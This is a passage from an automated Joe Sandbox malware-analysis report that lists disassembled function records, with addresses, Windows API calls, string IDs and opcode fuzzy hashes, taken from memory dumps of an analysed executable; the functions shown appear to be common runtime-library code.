                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                                                  • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                  • Instruction ID: 0435918e559abe1ca0dc515cf54f80becd868134b9fd083daa8488eebda3f3b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB119DA2E5CA0201F6B8333CDA57BF59140EF54374FD506B6E9EE066D6AF2CAC619130
                                                                                                                                                                                                                                  Function 00007FF79DAEA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF79DAE98B3,?,?,00000000,00007FF79DAE9B4E,?,?,?,?,?,00007FF79DAE9ADA), ref: 00007FF79DAEA6BF
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF79DAE98B3,?,?,00000000,00007FF79DAE9B4E,?,?,?,?,?,00007FF79DAE9ADA), ref: 00007FF79DAEA6DE
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF79DAE98B3,?,?,00000000,00007FF79DAE9B4E,?,?,?,?,?,00007FF79DAE9ADA), ref: 00007FF79DAEA706
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF79DAE98B3,?,?,00000000,00007FF79DAE9B4E,?,?,?,?,?,00007FF79DAE9ADA), ref: 00007FF79DAEA717
                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF79DAE98B3,?,?,00000000,00007FF79DAE9B4E,?,?,?,?,?,00007FF79DAE9ADA), ref: 00007FF79DAEA728
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                  • Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                                                                                                                                                  • Instruction ID: ac70437fc10438f0aa4ccdaedfce50475685451edffff5e97abd372fed77c339
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1113D20B0C24242FA78B735955197AA1919F9D3A0F844334E8BE566D6FE2CAD61C731
                                                                                                                                                                                                                                  Function 00007FF79DAEA534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                  • Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                                                                                                                                                  • Instruction ID: 6867d19374fc44f6591e26aacd59abe4c076e0ccc5d986c72aedbd14faefa738
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4311D620A0C20742FA78773554519BAA2818F4D360ED44B34D9BE1A2D6FD2CBC61D2B1
                                                                                                                                                                                                                                  Function 00007FF79DAEEED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                  • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                                  • Instruction ID: ce16e1e40b671d0c41acf242b30618d324f6bcfa0abc5d9aaa7453f32e854465
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB819D72E0C64385FB746F39C110A78A6A0EB19B48FD58035CA89972D9FB2DED21D231
                                                                                                                                                                                                                                  Function 00007FF79DADE5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                  • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                  • Instruction ID: c2574b0d3dbf8f59ddea9ff4eb5e8da495ddb5536ac2b93ac1c02621c8a21efd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64518E32A0C78286EB74AB31D064B68B6A0FB54B84F954135DADC47BD1EF3CEA608711
                                                                                                                                                                                                                                  Function 00007FF79DAD7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,?,00007FF79DAD324C,?,?,00007FF79DAD3964), ref: 00007FF79DAD7642
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                  • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                                  • Instruction ID: 30d3b53ed3e025c1b2121a36a6967f0338629fce174c04fdc8dbfe20e43afbcb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB31966161DAC545EA31AB35E420FEAA254EB44BE0FC44231EAEE477C9FF2CDA158710
                                                                                                                                                                                                                                  Function 00007FF79DAD25F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                  • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                                  • API String ID: 1878133881-653037927
                                                                                                                                                                                                                                  • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                                  • Instruction ID: 2aaba49c2f38e8dc0ba63d3529e3080059e9ce73f804e5d9f38e2d5c8f09e634
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E116D7262CB8581EA30AB20F461FE9B364FB48B84FD05136DA9D07644EF3CDA29C710
                                                                                                                                                                                                                                  Function 00007FF79DAEB8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                                                  • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                                  • Instruction ID: 1aa04ad595a43e3b1fe1c4f043d8862b3e657ea55c3b965434307c8678d961e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FD13972B0CA8189E720DF75D4446EC77B1FB48798B804235CE9E57B99EE38D826C320
                                                                                                                                                                                                                                  Function 00007FF79DAF4E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                  • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                                  • Instruction ID: 3fdcae861f4c7ef375b2f0f072040e8fe84f5fca1799f618cec7d0fbc168d97f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4541CA12A0C68255F734AB3AD402BB9D650EB90BA4F544276EEDC07AE5EF7CD861C710
                                                                                                                                                                                                                                  Function 00007FF79DAEF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID: .$:
                                                                                                                                                                                                                                  • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                                  • Opcode ID: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
                                                                                                                                                                                                                                  • Instruction ID: 58ee546e7512b703a2de2eecbc7bd781a5576cb8f567ba6d92b4c15c6a6d0042
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29415F22F0C75298FB20ABB198515BC6674EF18358F950435DE8D57A95FF389861C330
                                                                                                                                                                                                                                  Function 00007FF79DAEE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000F.00000002.1505257262.00007FF79DAD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF79DAD0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505232385.00007FF79DAD0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505290344.00007FF79DAFB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB0E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505322733.00007FF79DB14000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000F.00000002.1505380426.00007FF79DB16000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_15_2_7ff79dad0000_5B34.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                  • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                  • Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                                                                                                                                                  • Instruction ID: 76ad9b883001a95a23f01ea77afe3eea8159b96a1b5374bcc5779f4d252ed99b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD218D62A0C68282EB70AB25D044A6DE3F1FB88B44F858035DACD47684EF7CEE55C771